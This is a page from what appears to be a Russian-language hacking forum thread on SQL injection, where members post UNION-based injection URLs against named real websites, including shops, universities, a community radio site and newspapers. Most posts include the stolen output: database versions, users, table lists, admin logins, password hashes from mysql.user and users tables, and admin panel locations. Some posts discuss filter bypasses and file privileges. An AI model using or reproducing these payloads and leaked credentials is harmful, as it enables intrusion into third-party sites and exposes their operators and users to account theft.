SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. kolenwal

    kolenwal New Member

    Joined:
    13 Dec 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    0
    http://www.matica.com/play_game.php?gameID=-22+union+select+1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--

    5.0.67-community:agency23_alex@localhost:agency23_matica

    В базе около 3000 юзеров,7 баз
     
    #7241 kolenwal, 2 Jan 2009
    Last edited: 2 Jan 2009
  2. TOOZEГ

    TOOZEГ Banned

    Joined:
    31 Dec 2008
    Messages:
    1
    Likes Received:
    4
    Reputations:
    0
    А ШЕЛЛ ЗОЛИЛ?
     
  3. WAR!9G

    WAR!9G Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    112
    Likes Received:
    89
    Reputations:
    1
    Латвийская справочна служба.

    http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,2,3/*

    User: dba@
    Version: 5.0.16-nt-max-log
    Database: do

    http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(user(),0x41),0x41),3/*
    http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(version(),0x41),0x41),3/*
    http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(database(),0x41),0x41),3/*

    Далее знакомый сценарий - information_schema:

    http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(table_name,0x41),0x41),3+from/**/information_schema.tables/*

    .. или mysql.user по умолчанию:

    http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(user,0x41),0x41),3+from/**/mysql.user+limit+1,1/*
    http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(password,0x41),0x41),3+from/**/mysql.user+limit+1,1/*
     
  4. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://www.domkino.spb.ru/description.php?id=-406+union+select+1,2,3,4,5,6,7,8,9,concat(user(),0x3a,version(),0x3a,database()),11,12--
    [email protected]:5.0.67:domkinospbru
    Code:
    http://www.domkino.spb.ru/description.php?id=-406+union+select+1,2,3,4,5,6,7,8,9,concat(login,0x3a,password),11,12+from+user--
    shurik:ahin
    PR:5
    тИЦ: 475

    Админку ненашёл=//
     
  5. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    "OOO Румтехтранс"

    Code:
    http://www.kaolin-gob.kiev.ua/index.php?inc=docs&key=r&id=-1+union+select+1,version(),3,4,5,6,7,8--
    "Webzavod - дизайн, разработка сайтов"

    Code:
    http://www.webzavod.com.ua/?mid=-1+union+select+1,2,3,4,5,6,7,version()--
    
    На сайтах, в портофолио, так же есть инъекция.
     
    #7245 R1dex, 2 Jan 2009
    Last edited: 2 Jan 2009
  6. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Такс начинаем создавать свои игры !!!

    http://www.xgamestation.com/view_product.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a3a,version(),user(),database()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

    Version:5.0.27-community-nt
    User:Administrator@localhost
    Database:gamestation

    http://www.xgamestation.com/view_product.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a3a,user,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user--

    root::*8FFA6C4A39732DF6BF13184E70BE8FAFC475656A
    Administrator::*514CF3488C00733A185644DCC8DBB8BEE63B180F
    gruvii::*BD2B2BB6A9881E0FE04B20ED719246D01071975D
    xgamestation::*1BA76162951F45EE1C6CB19DD64B39325E093978
    eric::*D2E840839C2168F0AB422575182CF92EFDF36C7B

    http://www.b2cpowershop.com/tell_a_friend.php?goods_id=-1641+union+select+concat_ws(0x3a3a,version(),user(),database())--

    Version:5.0.22-community-max-nt
    User:[email protected]
    Database:btwocp0wersh0per


    http://www.compel.com.tr/Include/Modules/ProductDetail.php?CatID=22&ManID=21&ProID=-2893+union+select+concat_ws(0x3a3a,version(),user(),database()),2,3,4,5,6,7--

    Version:4.1.22-standard
    User:compelc_iskender@localhost
    Database:compelc_compel

    http://www.mandeno.co.nz/print/print_item_details.php?itemid=-3883+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

    Version:4.0.20-standard
    User:mandeno@localhost
    Database:mandenoshop


    Australian Community Radio Podcasts!

    http://www.cpod.org.au/page.php?id=-67+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8--

    PR:5

    Version:5.0.45-log
    User:CBAA@localhost
    Database:cbaa

    Торговля книгами!

    PR:6

    http://www.lcoastpress.com/book.php?id=-33+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

    Version:4.1.22
    User:lcpdb@localhost
    Database:lcpsite
     
    #7246 spherics, 2 Jan 2009
    Last edited: 2 Jan 2009
  7. vladvk

    vladvk New Member

    Joined:
    22 Dec 2008
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Никто не хочет дальше покрутить:
    http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/table_name+from+information_schema.tables--
    http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/version()--
     
  8. WAR!9G

    WAR!9G Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    112
    Likes Received:
    89
    Reputations:
    1
    Database:dcmagazin
    Version: 5.0.67
    User: dcmagazin@localhost

    http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/table_name+from+information_schema.tables+limit+1,1--

    Но в целом смысла не имеет, так как:
    http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/table_name+from+mysql.user--
    SELECT command denied to user 'dcmagazin'@'localhost' for table 'user'
     
  9. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    http://www.lit-across-frontiers.org/projects_detail.php?id=1'+UNION+SELECT+1,concat_ws(0x3a3a,v ersion(),user(%20),database()),3,4 ,5,6/*

    Version:5.0.45
    User:laf@localhost
    Database:laf

    тИЦ 10
    PR 6
     
    1 person likes this.
  10. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.tekojoja.org.py/v1/news.php?id=-1+union+select+1,concat_ws(0x3a,name,pass,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13+from+user--
    логин/пасс/юзер/версия/бд:
    Code:
    admin:admin:tekojoja_tekojoj@localhost:4.1.22-standard:tekojoja_bd
    ---------------------------------------------------------------
    The End!​
     
    2 people like this.
  11. a.su.s

    a.su.s Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    42
    Likes Received:
    20
    Reputations:
    0
    www.henleystandard.co.uk

    Code:
    http://www.henleystandard.co.uk/news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
    version() - 5.0.45
    user() - hsta@localhost
    database() - henleystanda


    Таблицы:
    Code:
    henleystanda
    adfeature_upsell
    archive
    archivemedia
    breaking_news
    comments
    displayads
    editorial
    editorschoice
    jobs
    [B]lineage[/B]  :) 
    media
    notices
    registration
    schools
    schoolsnews
    www.thepuckstopshere.co.uk

    Code:
    http://www.thepuckstopshere.co.uk/news.php?r=1&t=2&id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    version() - 4.0.27-standard-log
    user() - [email protected]
    database() - db69748003
     
    2 people like this.
  12. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    как обычно, еду...
    Code:
    http://www-hto.usc.edu/ppl/intro_page.phtml?id=-435+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
    
    доступ к mysql.user=on
    file_priv=on
    magic_quotes=off


    Code:
    http://www.ittc.ku.edu/view_project.phtml?id=24/*%00*/+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
    наглядный пример обхода фильтрации(ereg/eregi) благодаря ошибкам в пхп...
     
    #7252 Iceangel_, 2 Jan 2009
    Last edited: 2 Jan 2009
    2 people like this.
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.wfsj.org/news/news.php?id=-110+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_encrypt(version(),0x73),0x73),9,10/*
    4.1.7
    админка:
    Code:
    http://www.wfsj.org/admin/
     
    _________________________
    3 people like this.
  14. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Почти все, пальцем в небо...
    Code:
    http://www.thepuckstopshere.co.uk/news.php?r=1&t=2&id=-1+union+select+1,2,concat_ws(0x3a,id,pwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users--
    это, судя по id, это админ, тока админку чето не нашел...
     
    #7254 Gemini12, 3 Jan 2009
    Last edited: 3 Jan 2009
  15. lexus5122

    lexus5122 New Member

    Joined:
    16 Mar 2007
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0

    - Админка

    - пароль

    А вот логин...?
     
    1 person likes this.
  16. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    логин че то не нашел, я же вслепую тыкал, все перепробовал: user, username, login, name, user_name, user_login, login и т.д

    Может у кого получится?
     
  17. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    PageRank: 6
    http://oia.pdx.edu/ea/programs/search.php?pid=-9111+union+select+1,2,3,4,5,6,7,8,concat_ws(0x2f,name,pass,mail),10,11,12,13,14+from+users+limit+1,4--
     
    1 person likes this.
  18. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Nbs.bg.ac.yu - PR8 ~3к
    4 ветка..


    Wosa.co.za - PR7 ~2.5к
    4 ветка..

    C Новым 2009 )
     
    #7258 sabe, 3 Jan 2009
    Last edited: 3 Jan 2009
  19. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Очаровательные пёсики Бульмастифы -)

    Доступ закрыт но вывод есть в шапке -)

    http://catalog.bullmast.ru/dog.php?screen=1&id=-5935+union+select+concat_ws(0x3a3a,version(),user(),database()),2,3,4,5,6--

    4.0.27-max-log
    [email protected]
    bullmast_mstf

    http://catalog.bullmast.ru/dog.php?screen=1&id=-5935+union+select+concat_ws(0x3a3a,name,password),2,3,4,5,6+from+users--

    admin :: 8099d55d6551a908d0c0c379cde265b0
     
  20. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Караем УГ: Национальный университет Ганы
    Code:
    http://www.[B]ug[/B].edu.gh/index1.php?linkid=-1+union+select+concat_ws(0x3a,version(),user(),database())/*
     
Thread Status:
Not open for further replies.